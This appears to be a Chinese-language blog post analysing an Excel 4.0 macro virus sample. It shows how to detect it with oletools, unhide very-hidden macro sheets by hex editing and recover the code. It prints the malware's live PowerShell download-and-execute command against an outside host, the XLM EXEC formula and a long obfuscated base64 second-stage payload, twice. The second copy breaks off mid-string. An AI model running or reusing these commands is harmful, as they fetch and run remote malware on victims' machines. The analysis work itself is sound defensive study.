工欲善其事必先利其器,首先既然遇到的是宏病毒文件,所以本地得装好office,本文使用的环境为office2016,之后打开Excel。额,咋和平时看到的Excel表格不一样?如果不嫌麻烦ocr一下图片里显示的意思大概是说得启用宏后才能查看到图片内容,本质就是诱惑用户来启用宏,所以文档存在宏代码的话一启动就被提示需要启用宏。嘿嘿,别启用就对了。
对于宏病毒,笔者目前接(是)触(工)不(具)多(党),不过之前使用过一个Python工具oletools。如果是Python2.7环境则安装命令为:pip install oletools。
装好后,利用oletools工具里的mraptor(macrorapter)查看是否可疑,如下显示可疑文件。
如果使用olevba提取恶意宏会解析失败,如下。
如果之前没有过多接触宏病毒,到这里肯定就一头雾水。其实原因是该样本没有存在VBA宏,而是被检测到了Excel 4.0宏(这个技术存在的时间比我年龄还大,真的),属性设置为隐藏。
关于Excel 4.0宏暂时不过多介绍了,因为参考链接里介绍的很详细了,有兴趣就直接看文末的链接,没有兴趣直接看笔者接下来的操作。不过虽然不能手工提取恶意代码,但是取巧也可以通过沙箱获取执行的命令,如下。
第一阶段命令,如下。
powershell -command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://putin-malwrhunterteams.com/scan.txt');
第二阶段命令scan.txt内容如下,会使用IEX命令当做脚本内容执行。
PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAWgBoAFoAZwB7ACAAcABhAHIAYQBtACgAJAB4AEkAeABmAG0AVABGAEwASAB2AFEAUgBOACAALAAgACQARwBQAHQARQBsAHQASwBTAGwAUwBCAEkARAB3AEEAcgBPAHAAaAByAGgARgB5AGcAeAB4ACAALAAgACQAcQBmAGoAeQBkAHoAbwBSAHgAUgBnAFAAQQBEAGUAWABmAGQAZABQAEoASwBRAGgAYQBrAFYAdwBBAFIATQBIAG8AdgBUAG4AQwBUAFgASQBQAGYAKQANAAoAJABEAGkAUwBDAFQAaABvAGcAUABDAFgAdABlAHIAUQBnAEYAWgBiAEUAawByAFYATABHAFUAQQBlAEgAcQB6AEEARAAgAD0AIAAnAHQAUwB5AEoAbgBHAEgAbgBYAHoAdwBlAGUAWABPAFcAVQBJAHkAYwBDAEwATgBIAHcAeQBoAEsAWQAnADsADQAKACQAQwBXAHAAdgB5AHkAaQB2AGwAVQB4AHgAVQBWAE8AYgBxAGQAUABsAFcAcQAgAD0AIAAnAGIAZgBpACcAOwANAAoAJAByAE0AbwBaAHcAIAA9ACAAJwB5AHgAYQBwAGkAWgBQAG8AWQBXAGUAZgBGACcAOwANAAoAJAByAHMAVgBJAEUAdQBtAEMATABVAE8AUQBQAHUAcQBqAHcAdgBBAGkAVgBZAG8AbQBIAEQAQQB4AHkAVABYAHcAWgByAE0AeQAgAD0AIAAnAGcAVgBCAGIAdwBsAEcAYgBTAEoAVgB4AG8AYQBqAGUAVwBWAFQARABpAEIAQQB1AHAARAByAHcAUgBxAFgAaABzAHIAUQBaAHkAJwA7AA0ACgAkAFkAbQBpAEwAbwB1AGUAIAA9ACAAJwBKAHQAJwA7AA0ACgAkAFIAQwBXAHQAdgBKAGUAVgBIAG0AcwB0AEoASgBiAGwAbwBGAHgASgBKAGcAUQB3AGcAVgBXAE0ARwBRAHAAdQB5AEgAIAA9ACAAJwBvAEIAJwA7AA0ACgB9AA0ACgAkAHgAaQBtAEUAcgBVAGcAdABZAEMATgBJAHEAdQBNAGsAZgBsAG0AWgBNAFoAbQBSAE8AcgB3AHkAdgBDAEkAbgBqAEEAIAA9ACAAJwBPAFgARQBvAHYAUQBuAHgAJwA7AA0ACgBJAGYAIAAoACcAegB4AFoAdQBpAE8AYgBQAEIAYwBiAFgAdwBVAHAAegBZAGkAJwAgAC0AZQBxACAAJwBWAHQAYQBZAHEAbQB4AE0AYgB3AHIASgBaAGMAUgBTAFIAUgBCAFAAZwBhAHQAbABIAFkAawBTAEMATwBvAFgAaABvAGIAYgBZAFoAagBIAGsAQgAnACkAIAB7AA0ACgAkAFMASwAgAD0AIAAnAEMAdgBlAEMAWQBpAFcAUwBSAHYAegBvAFEAUgBDAGYASwAnADsADQAKACQASABUAGIAawBBAHEAdAByAGgAdQBmAGYAIAA9ACAAJwBiAGIAcABWAHAAbwBBAHAARwBCAFAAVwBmAGIAagBJAFIARgBGAHEAbgBMAHEAJwA7AA0ACgAkAFMAdQBkAaABBAGMAbgBsAFYAWQBOAGIAdwBOAHIASgBYAEEAUwBNAE4AVgBQAEoAaQBRAG8AYQBvAG0AUABrAHgARAB1ACAAPQAgACcAcwBJACcAOwANAAoAJABZAGMAbABLAEMAVwAgAD0AIAAnAFUAcwBOAGcAUQBLAFgAZQBFAFoAWQB5AHkAawB0AdwBpAEkAYwBkAHQAUwByAFIATwB2AHQAJwA7AA0ACgAkAGMASwBNAG4AQgB2AHcATQBJAFcARgBNAFQAeQBWAGIAdABLAFYAbABQAG8AYgB1AHQARABiAFoAVwBPAEIAIAA9ACAAJwBkAHUAYgBPAE0ASwB3AHAAcQBBAG8ATABEAFAAJwA7AA0ACgAkAHYAdwBQAFkARQBhAEkAVQBvAGkAIAA9ACAAJwB0AHgAVABYAHAAdABWAHEAaQBZAFcASABPAGkATgBmACcAOwANAAoAfQANAAoAJABQAHoAUQBxAGUAdABnAGMASABxAHgAbwBWAGEAbgBmAHUAUgB5AFYAVABLAHYAcQBNAGcAbABZAHAAQQBwAHEAdQBPAEUAcABTAGEAUAAgAD0AIAAnAG4AdQBpAEMAWAAnADsADQAKAEQATwB7AA0ACgAkAFoAYgB0AFMATABUAG0AcABOAGcAWQBiAGsAbgB6AGwAdAB3AFMAdwBnAEcAYgBCAFEASABHAGQAawAgAD0AIAAnAEEAUABVAGIAQgBkAEsARwBTAGQAVQBSAGEAYQAnADsADQAKACQAZwBKAFQAVgBNAFQAWABqAHgAQgBTAHoAcgBDAEQATQBKAEYAeQBnAEkARwBJAGwAVwAgAD0AIAAnAG4AZABvAGIATwBnAEIAWQBrAHgAbgBIAFgAdgBkAGcAWABaAGkAZABTAEQAUAAnADsADQAKACQATABNAGIAdABVAFoAQQBoAHoAbABnAHQAdQBWAG4AbQAgAD0AIAAnAFQAUwBHAFoAQgBoAEQAQwBjAGoAaQBEAHMASQBqAE8AWABRAEMARQBJAEUASwB3AEYASQBsAFAAagBsAEIAbQB2AGYAegBsAEkAcwBKAGUAWQByACcAOwANAAoAJABxAFMAZQBHAGQAeABlAFgARgBrAGkAcABQAEgASgBUAHMAdwBuAFMAcgBoAHcASABOAEoAeABGAGUARwBZAGcAUQBNAFQAZQBiACAAPQAgACcASQBTAEYAJwA7AA0ACgAkAHcAQgBOAHAAagBlAHoAWQBRAGkAawBZACAAPQAgACcASgBWACcAOwANAAoAJABzAFQAegBZAHQAeQBNAEIAWgBEAG4AZQByAHEAbgBWAE4AZABrAHUAIAA9ACAAJwBYAFoAVABHAEYAcQBxAHYAcwBMAEsASQBGAEoAbwBTAGcAVQB5AG8ATABRAGcAcQBWAGgAYQB1AE8ASwBXAFkAYgBjAFUAdQBnAFMAbgAnADsADQAKACQATgB5AGkAPQAgACQATgB5AGkAIAArACAAMQA7AH0AIABXAGgAaQBsAGUAIAAoACQATgB5AGkAIAAtAG4AZQAgADYAKQANAAoAVwBoAGkAbABlACAAKAAkAFcARwBnAHIAZABWAG0AZwAgAC0AbgBlACAANgApACAAewANAAoAJABEAGcASgBtAEYAaQBIAHQAYwBsAFkAUAB2AGcAaABvAGwAaABjAG8AdQBsAE4AaABxAFMARgBrAG8ATgB6AHUAdAB1AEwAZABOAG0AVgB1AE4AQgBEACAAPQAgACcATwBzAGEAWgB5AEMAcwBvAEoAcwBGAFIAVABjAHYAbgBjAFgARQBQAGwAZQBXAEIAVgBFAGIAeQBMACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGEAdABpAGYAVAB4AHIAZgBsAG0AVgBMAGsAQQBwAHQASwBrAHIAaQBSAHEAdwBvAHcAagBXAFoARAAgAD0AIAAnAGEAdABjAGIAUgBMAGoAbgBKAHgAdgB4AGwAUwB1AGEAdABWAEwAYwB0AHIASABkAFIAawB3AHQAagBqAGIAUwBiAHIATABiAGkASgBqACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAEoAVwBiAHQAbQBUAEUAZQB0AFYAcQBBAE8AYgBBAGoAbQB6AEoAZwBQAHAARABaAFcAZAAgAD0AIAAnAHQASABTAHIAawBtAGgAUwBXAFAATgBxAHgAZgBSAHoATwB0AGIAJwA7AA0ACgAkAFcARwBnAHIAZABWAG0AZwA9ACAAJABXAEcAZwByAGQAVgBtAGcAIAArACAAMQA7ACQAegByAGIAcAAgAD0AIAAnAHoAQwBPAFUAVABCAFgASgB5AEwAWABiAGQARgBPAGgASgBkAFUAWQBJAE0AQQB5AHEAcABnAHYAWgBWACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGYAZABJACAAPQAgACcAagBUAHkARABOAHEAZwB5AFUAdQBZAGsAbgBNAFcAcQBOAEgAUQBhAG4AQgBRAGQAZQBVAGIAagBjAEkAcwAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAJABWAFYAZgBPAEwAYQBHAGgAYwBOAGYARQBSAEUAdABpAEQAZgBvAFkATgBoAHgAaABDAFUAWgB0AE8AeABXAE0AQwBiAFAAUgBoAEkAZQBEAIAA9ACAAJwB5AFoAVgBNAE0AYQBiAHQAZwB3AFQAVABrAG4AWQB4AEwAcgBBAE4AVABlAHIAVABDAHAAbwBjAEIAdgAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAbwB2AHEAcgBtAFMAawB5AHgAUgBQAE8AbQB1AFEAeQBRAGMAcgBzAGsAbwBRAEcATABQAGEASABUAEwAdgBxAFIAQQBWAEYATwBCAGwAewAgAHAAYQByAGEAbQAoACQAQgBYAGUAIAAsACAAJABYAEwAcQBIAHoAUgBWAFEAWgBzAGkAcgBjAHQAagB4AG0AbQBuAFAAVABpAEMASwBXAGwAegByAGwAdgAgACwAIAAkAHYARgBFAEEAbQBVAGsAQgB2AHgATwBTAGIAVAB5AEwAaQAgACwAIAAkAHkATwBPAGsATwBQAG8ASgBnAGsATgBTAGQAZgBkAFoAIAAsACAAJABsAFkAcwB4AGMAQwBrAHIAUwBGAFEAYgBxAFkAWgBRAFoAbgBnAEUASwBxAG8ATABkAG8AegBvAGMAVABpAG8AQgAgACwAIAAkAE0AbgBxAFYAVgBNAGQAcwB3AEsAWQBoAHAATQBMARABzAHcAVgBjAHYAagBnAFQAbwBEAHcAIAAsACAAJAB5AFcAYwBaAEsATABsAGEARQBSAFUAYgBTAHUAIAAsACAAJABuAHYAeQBtAEEAWgBRAHEAcgBnAEUAUgBEAEoAQgBoAEoAaABkAHkAbgB3AEkAZgBCAEIAIAAsACAAJAB6AGEAYwB1AEsAQQBGAHMAWQBxAFEAdwBwAGkAZwBrAHMARgB0AGkAUQBEAGsATAApAA0ACgAkAGYAeABzAFIAUgBXAEcATABkAGoAQQBhAHQAVABKAEEAZgBrAGcAWABzACAAPQAgACcAZQBsAFYAWQB4AG0AWQBMAGoAUAByAFQATQBuAHYAegBvAHAASgBQAGUAagBMAFYAeAAnADsADQAKACQAcQBWAFoAZQBWAE8AZgBDAFMARwB2AHMAWQBUAG0AUgBBAGsAagBaAEgAVgBFAGcAdgByAE4AZAB5AHYAWgBBAGIAegB2AEQAbQBFAHUAZABvAEoAIAA9ACAAJwBwAEQAdwBRAHAAYwBOAGoAYQBtAFgAcQBWAFEAdABqAGQAQQAnADsADQAKACQARQBYAGcAIAA9ACAAJwBSAFkAWABpAGUAdgBxAEcAbAB4AEEAUABjAHoAYQBZAEEAbABMAHkATgBFAEoAYQBuAHQAVgBRAGMAbQBGAHgASQBIAGYAcwBSAHUAaQBuACcAOwANAAoAJABmAG0AcwBVAEIAUQBrAEQAYwBCAFQATABoAGgATQBQAHgAdgBsAGEAYQBkAHkAcwBEAEcAVQBUAGkARwBGACAAPQAgACcAWQBPAGkAUgAnADsADQAKACQARgBsAGMAbABNAEEAawBsAGwAYgBhAFMAYwBVACAAPQAgACcAdwBNAEoAQwBEAUgB2AHYAUQBVAFYAdgBRAG0AUwB6AHYAegBzAEoASgBwAE4AZABPAEcAUgBlAHUAQgBHAG0ARwBHAE0ARgBmAGUAUABvAHEAZwAnADsADQAKACQAcwBlAG8AVgB5AEkAYQBYAGMAYgBxAG4AVwB3AFoAWgB0AHoAIAA9ACAAJwBCAE8ATwBqAHAASwBhAE4AVABRAGoARQBTAGMAVgAnADsADQAKACQAeQBaAGwAVABXAFQAZQBkAEsAUQBTAHAASgBHAEYAVwBvAFoAZgAgAD0AIAAnAGQAdgB6AEsAWQB1ACcAOwANAAoAJABHAHQAWABYAEwAQgBhACAAPQAgACcAegBIAGcAdQBoAGsAbABaAFoAcgBsAEUATgBLAE4AUAB0AHcAUABzAEQAWgBiACcAOwANAAoAJABiAE4AWABrAG0AcwBIAG4AaQBmAEYAUABIAGYAeQBVAHIAVwBhAFMAbQBwAHMAdwBnAEgAZQBPAG0AaQBYAGEAZwBsAFMAVABOAEIAbQAgAD0AIAAnAGsAeABXAGkARQB4AEgATgB5AHUAQQBoAHoASQBJAG0AVQBiAEQAZgBPAHQAQgBBAEgAZgBpAFcAJwA7AA0ACgAkAGUASABxAGsAdQBpAG8AVABLAHIAaQBBACAAPQAgACcAUQByAGgAcQBhAFgAZABnAHoAbQB4AEcAUgByAHcAJwA7AA0ACgAkAGEAWgBQAGwAQQBUAG4ASgB4AEYAWgBUAFMASgBqAFYAZgB5AGMAIAA9ACAAJwBTAFIARgBLAHQAZwBlAFYAcwAnADsADQAKACQAYwByAHIAeABrAFMAVABPAFAAdwBFAFkAcwBWAHkASgBOAHEAQwBjAGIAUwBPAG4ARAAgAD0AIAAnAFUARQBzAFUAbwBTAFIAVQAnADsADQAKACQAaQBiAFYAWQBSAEMAUQBqAGYARQB1AFkAagBNAGoAUwBvAFMAUQBCAEoAYwBEAHQAYwAgAD0AIAAnAE8AVwB1AEkAbQBHAFkAcwBQAGgAcwBSAGsAWgBMAGoAagBqAEoAagBrAHIASgBDAEEAegBBAFQAUwBGAFgAYgB3AFQAbgB1AHAAWABTAG4AQQByACcAOwANAAoAJABCAFoAWABpAHEAcABhAHQAVQBrAHMATgBYAE0AcwBJAG4ARwBGAFoASgBKAFIAVQBRAG0AUQB1AEwAUgBWAGoAdAB1AEgAYwBjAFEASgBkAHMAIAA9ACAAJwBEAHIARABHAFEAaAB3AFAAZQBoAHUAJwA7AA0ACgB9AA0ACgAkAG4AcgBJAEMAUgBFAFkAZwBoAEQATwBKAFUAYwBGAFAAIAA9ACAAJwBXAHcAYwBoAHgARwBhAFEASwBWAGoAeAB3AG0AbwBvAGIASABQAFUAYQB6AEYARQBMAGUAegAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAGoASABmAE8AVgBtAEEAdQBBAFIAbQBrAHEASQBBAHgATQBHAEgAawBVAFYAYgBBAHsAIABwAGEAcgBhAG0AKAAkAHUAbABuAGIAaABrAEkAawBTAGoAcABsAGgAbABHAGkAcABqAGwAUgBaAFUAcwBWAHAAIAAsACAAJABFAFgAcgBYAFYAVABIAHgAVwBZAGkASABRAE0AZQBEAFcAcgBSAGUAbQBvAHMAVwBPAGMAcwBoAEMAWgB0AFMAbQBsAGYAbAB0AHUATwBXACAALAAgACQAawBQAGkAQQBoAFMAWQBuAFcAeQBBAEQATABJAFAAZQBVAEkAdABhAFoAdQB3AGYAUAAgACwAIAAkAGUAaAB0AEoAYwBkAHYAQgBDAFoASwBXAGcASgBUAHUAZwBiAHMAIAAsACAAJABhAGQAUABHAFoAbABWAHYARABwAFMAQwBsACAALAAgACQAbwByAHUATQBXAFcASQBLAEcAcQBVAHkAKQANAAoAJABGAFcARwBRAFcAWgBtAGIASgBsAG8AWQBiAHgAUABrAFIAbgAgAD0AIAAnAEgAYwBmAE4ASQBNAHQAagBNAE4ASABPAGYAZQB0AFAAUQB1AGUAZQBzAEEASQAnADsADQAKACQAWABMAFkAbABKAHIAQQBDAGgAQgBzAHIAWgBJAHgARQBkAHAAWgBOAEMAWABJAHUAaABoAHoAcAAgAD0AIAAnAEoAaABIAFQAeQBxAHcAbgBJAGEAVQBNAEUAZwBkAGwAQwBwAEkAdwBaAEIAQwBhAHUAZgB6AEQAZQBFAGIAcwBLAE8AJwA7AA0ACgAkAFQAbABZAGIAUgBCAFEAVQBQAEYAQgB4AHEAZQBJAGYAcwBxAHMATgBJACAAPQAgACcAaABZAFQAcgB0AEkARQB5AGIAQwBxAEoASwBBAGQATwByAHYASgBnAG4AVQB0AGgASgBZACcAOwANAAoAJABZAGoAQgBSAEEAUABvAEUAegBJAFoASQBIAFEAUQBkAHoARwBoACAAPQAgACcASQBCAGUAegB4AEUAYwByAE0AZQBsAGkAVQBtAGYAUABhAGsAJwA7AA0ACgB9AA0ACgAkAHIAZQBnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAGYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZQA0ADkAdQAwACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAQAAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBkAGwATwBNAHoAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAawAgAYQBjAGsAaQB0AHUAcABdADoAOgBlAHgAZQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA= | &('I'+'EX')
该样本是无法通过右键来取消隐藏的,因为首先文档里不显示宏工作表,想右键取消会发现没有选项,但是这里可以使用oledump这个工具辅助一下,使用的命令如下:
oledump_V0_0_50>oledump.py -p plugin_biff.py --pluginoptions "-o BOUNDSHEET -a" C:\Users\onion\Desktop\Dokumentation.xls\Dokumentation.xls
得到位置序列:51 AA 02 00 01,0x00表示不隐藏,0x01表示隐藏,0x02表示深度隐藏。
直接手工修改十六进制,如下。
当保存后重新打开会出现宏工作表,不过宏代码目前是无法显示的,因为字体设置为白色了,也是为了对抗分析,增加迷惑性。
我们可以选中后更改字体颜色,让宏代码显示出来。
由于字体显示空白,可将其复制,之后再新建XLM 4.0宏表,粘贴至另外的宏工作表,然后全选中,接着修改文字颜色,就可以查看了。咦,出现了明显的PowerShell脚本痕迹。
最后整理一下,完整代码如下。
=RETURN() p://putin-malwrhunterteams.com/scan.txt');exit =EXEC("powershell -command " & "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'t" & A9588)
拿到响应内容,如下。
PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAWgBoAFoAZwB7ACAAcABhAHIAYQBtACgAJAB4AEkAeABmAG0AVABGAEwASAB2AFEAUgBOACAALAAgACQARwBQAHQARQBsAHQASwBTAGwAUwBCAEkARAB3AEEAcgBPAHAAaAByAGgARgB5AGcAeAB4ACAALAAgACQAcQBmAGoAeQBkAHoAbwBSAHgAUgBnAFAAQQBEAGUAWABmAGQAZABQAEoASwBRAGgAYQBrAFYAdwBBAFIATQBIAG8AdgBUAG4AQwBUAFgASQBQAGYAKQANAAoAJABEAGkAUwBDAFQAaABvAGcAUABDAFgAdABlAHIAUQBnAEYAWgBiAEUAawByAFYATABHAFUAQQBlAEgAcQB6AEEARAAgAD0AIAAnAHQAUwB5AEoAbgBHAEgAbgBYAHoAdwBlAGUAWABPAFcAVQBJAHkAYwBDAEwATgBIAHcAeQBoAEsAWQAnADsADQAKACQAQwBXAHAAdgB5AHkAaQB2AGwAVQB4AHgAVQBWAE8AYgBxAGQAUABsAFcAcQAgAD0AIAAnAGIAZgBpACcAOwANAAoAJAByAE0AbwBaAHcAIAA9ACAAJwB5AHgAYQBwAGkAWgBQAG8AWQBXAGUAZgBGACcAOwANAAoAJAByAHMAVgBJAEUAdQBtAEMATABVAE8AUQBQAHUAcQBqAHcAdgBBAGkAVgBZAG8AbQBIAEQAQQB4AHkAVABYAHcAWgByAE0AeQAgAD0AIAAnAGcAVgBCAGIAdwBsAEcAYgBTAEoAVgB4AG8AYQBqAGUAVwBWAFQARABpAEIAQQB1AHAARAByAHcAUgBxAFgAaABzAHIAUQBaAHkAJwA7AA0ACgAkAFkAbQBpAEwAbwB1AGUAIAA9ACAAJwBKAHQAJwA7AA0ACgAkAFIAQwBXAHQAdgBKAGUAVgBIAG0AcwB0AEoASgBiAGwAbwBGAHgASgBKAGcAUQB3AGcAVgBXAE0ARwBRAHAAdQB5AEgAIAA9ACAAJwBvAEIAJwA7AA0ACgB9AA0ACgAkAHgAaQBtAEUAcgBVAGcAdABZAEMATgBJAHEAdQBNAGsAZgBsAG0AWgBNAFoAbQBSAE8AcgB3AHkAdgBDAEkAbgBqAEEAIAA9ACAAJwBPAFgARQBvAHYAUQBuAHgAJwA7AA0ACgBJAGYAIAAoACcAegB4AFoAdQBpAE8AYgBQAEIAYwBiAFgAdwBVAHAAegBZAGkAJwAgAC0AZQBxACAAJwBWAHQAYQBZAHEAbQB4AE0AYgB3AHIASgBaAGMAUgBTAFIAUgBCAFAAZwBhAHQAbABIAFkAawBTAEMATwBvAFgAaABvAGIAYgBZAFoAagBIAGsAQgAnACkAIAB7AA0ACgAkAFMASwAgAD0AIAAnAEMAdgBlAEMAWQBpAFcAUwBSAHYAegBvAFEAUgBDAGYASwAnADsADQAKACQASABUAGIAawBBAHEAdAByAGgAdQBmAGYAIAA9ACAAJwBiAGIAcABWAHAAbwBBAHAARwBCAFAAVwBmAGIAagBJAFIARgBGAHEAbgBMAHEAJwA7AA0ACgAkAFMAdQBkAaABBAGMAbgBsAFYAWQBOAGIAdwBOAHIASgBYAEEAUwBNAE4AVgBQAEoAaQBRAG8AYQBvAG0AUABrAHgARAB1ACAAPQAgACcAcwBJACcAOwANAAoAJABZAGMAbABLAEMAVwAgAD0AIAAnAFUAcwBOAGcAUQBLAFgAZQBFAFoAWQB5AHkAawB0AdwBpAEkAYwBkAHQAUwByAFIATwB2AHQAJwA7AA0ACgAkAGMASwBNAG4AQgB2AHcATQBJAFcARgBNAFQAeQBWAGIAdABLAFYAbABQAG8AYgB1AHQARABiAFoAVwBPAEIAIAA9ACAAJwBkAHUAYgBPAE0ASwB3AHAAcQBBAG8ATABEAFAAJwA7AA0ACgAkAHYAdwBQAFkARQBhAEkAVQBvAGkAIAA9ACAAJwB0AHgAVABYAHAAdABWAHEAaQBZAFcASABPAGkATgBmACcAOwANAAoAfQANAAoAJABQAHoAUQBxAGUAdABnAGMASABxAHgAbwBWAGEAbgBmAHUAUgB5AFYAVABLAHYAcQBNAGcAbABZAHAAQQBwAHEAdQBPAEUAcABTAGEAUAAgAD0AIAAnAG4AdQBpAEMAWAAnADsADQAKAEQATwB7AA0ACgAkAFoAYgB0AFMATABUAG0AcABOAGcAWQBiAGsAbgB6AGwAdAB3AFMAdwBnAEcAYgBCAFEASABHAGQAawAgAD0AIAAnAEEAUABVAGIAQgBkAEsARwBTAGQAVQBSAGEAYQAnADsADQAKACQAZwBKAFQAVgBNAFQAWABqAHgAQgBTAHoAcgBDAEQATQBKAEYAeQBnAEkARwBJAGwAVwAgAD0AIAAnAG4AZABvAGIATwBnAEIAWQBrAHgAbgBIAFgAdgBkAGcAWABaAGkAZABTAEQAUAAnADsADQAKACQATABNAGIAdABVAFoAQQBoAHoAbABnAHQAdQBWAG4AbQAgAD0AIAAnAFQAUwBHAFoAQgBoAEQAQwBjAGoAaQBEAHMASQBqAE8AWABRAEMARQBJAEUASwB3AEYASQBsAFAAagBsAEIAbQB2AGYAegBsAEkAcwBKAGUAWQByACcAOwANAAoAJABxAFMAZQBHAGQAeABlAFgARgBrAGkAcABQAEgASgBUAHMAdwBuAFMAcgBoAHcASABOAEoAeABGAGUARwBZAGcAUQBNAFQAZQBiACAAPQAgACcASQBTAEYAJwA7AA0ACgAkAHcAQgBOAHAAagBlAHoAWQBRAGkAawBZACAAPQAgACcASgBWACcAOwANAAoAJABzAFQAegBZAHQAeQBNAEIAWgBEAG4AZQByAHEAbgBWAE4AZABrAHUAIAA9ACAAJwBYAFoAVABHAEYAcQBxAHYAcwBMAEsASQBGAEoAbwBTAGcAVQB5AG8ATABRAGcAcQBWAGgAYQB1AE8ASwBXAFkAYgBjAFUAdQBnAFMAbgAnADsADQAKACQATgB5AGkAPQAgACQATgB5AGkAIAArACAAMQA7AH0AIABXAGgAaQBsAGUAIAAoACQATgB5AGkAIAAtAG4AZQAgADYAKQANAAoAVwBoAGkAbABlACAAKAAkAFcARwBnAHIAZABWAG0AZwAgAC0AbgBlACAANgApACAAewANAAoAJABEAGcASgBtAEYAaQBIAHQAYwBsAFkAUAB2AGcAaABvAGwAaABjAG8AdQBsAE4AaABxAFMARgBrAG8ATgB6AHUAdAB1AEwAZABOAG0AVgB1AE4AQgBEACAAPQAgACcATwBzAGEAWgB5AEMAcwBvAEoAcwBGAFIAVABjAHYAbgBjAFgARQBQAGwAZQBXAEIAVgBFAGIAeQBMACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGEAdABpAGYAVAB4AHIAZgBsAG0AVgBMAGsAQQBwAHQASwBrAHIAaQBSAHEAdwBvAHcAagBXAFoARAAgAD0AIAAnAGEAdABjAGIAUgBMAGoAbgBKAHgAdgB4AGwAUwB1AGEAdABWAEwAYwB0AHIASABkAFIAawB3AHQAagBqAGIAUwBiAHIATABiAGkASgBqACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAEoAVwBiAHQAbQBUAEUAZQB0AFYAcQBBAE8AYgBBAGoAbQB6AEoAZwBQAHAARABaAFcAZAAgAD0AIAAnAHQASABTAHIAawBtAGgAUwBXAFAATgBxAHgAZgBSAHoATwB0AGIAJwA7AA0ACgAkAFcARwBnAHIAZABWAG0AZwA9ACAAJABXAEcAZwByAGQAVgBtAGcAIAArACAAMQA7ACQAegByAGIAcAAgAD0AIAAnAHoAQwBPAFUAVABCAFgASgB5AEwAWABiAGQARgBPAGgASgBkAFUAWQBJAE0AQQB5AHEAcABnAHYAWgBWACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGYAZABJACAAPQAgACcAagBUAHkARABOAHEAZwB5AFUAdQBZAGsAbgBNAFcAcQBOAEgAUQBhAG4AQgBRAGQAZQBVAGIAagBjAEkAcwAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAJABWAFYAZgBPAEwAYQBHAGgAYwBOAGYARQBSAEUAdABpAEQAZgBv